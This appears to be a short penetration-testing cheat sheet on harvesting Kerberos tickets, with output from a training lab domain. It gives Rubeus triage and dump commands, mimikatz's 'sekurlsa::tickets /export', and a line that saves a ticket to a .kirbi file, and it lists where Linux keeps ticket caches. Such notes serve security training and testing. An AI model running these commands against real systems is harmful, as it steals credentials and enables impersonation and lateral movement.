88 - Kerberos

Harvest tickets from Windows

Rubeus triage will list the Kerberos tickets in all the logon sessions currently on a system. If you're not in a elevated state it can only show tickets in your own logon session.

C:\Tools\Rubeus\Rubeus\bin\Debug> Rubeus.exe triage
 ------------------------------------------------------------------------------------------------------------------ 
 | LUID     | UserName                    | Service                                       | EndTime               |
 ------------------------------------------------------------------------------------------------------------------ 
 | 0x79474  | bfarmer @ DEV.CYBERBOTIC.IO | krbtgt/DEV.CYBERBOTIC.IO                      | 10/18/2021 4:13:03 PM |
 | 0x3e4    | srv-1$ @ DEV.CYBERBOTIC.IO  | krbtgt/DEV.CYBERBOTIC.IO                      | 10/18/2021 4:11:00 PM |
 | 0x1f8cd  | jking @ DEV.CYBERBOTIC.IO   | krbtgt/DEV.CYBERBOTIC.IO                      | 10/18/2021 4:10:56 PM |

# Using mimikatz
sekurlsa::tickets /export
# Dump all tickets with Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

Harvest tickets from Linux

On Linux, tickets are stored in credential caches or ccaches. There are 3 main types, which indicate where tickets can be found:

• Files, by default under /tmp directory, in the form of krb5cc_%{uid}.

• Kernel Keyrings, an special space in the Linux kernel provided for storing keys.

• Process memory, used when only one process needs to use the tickets.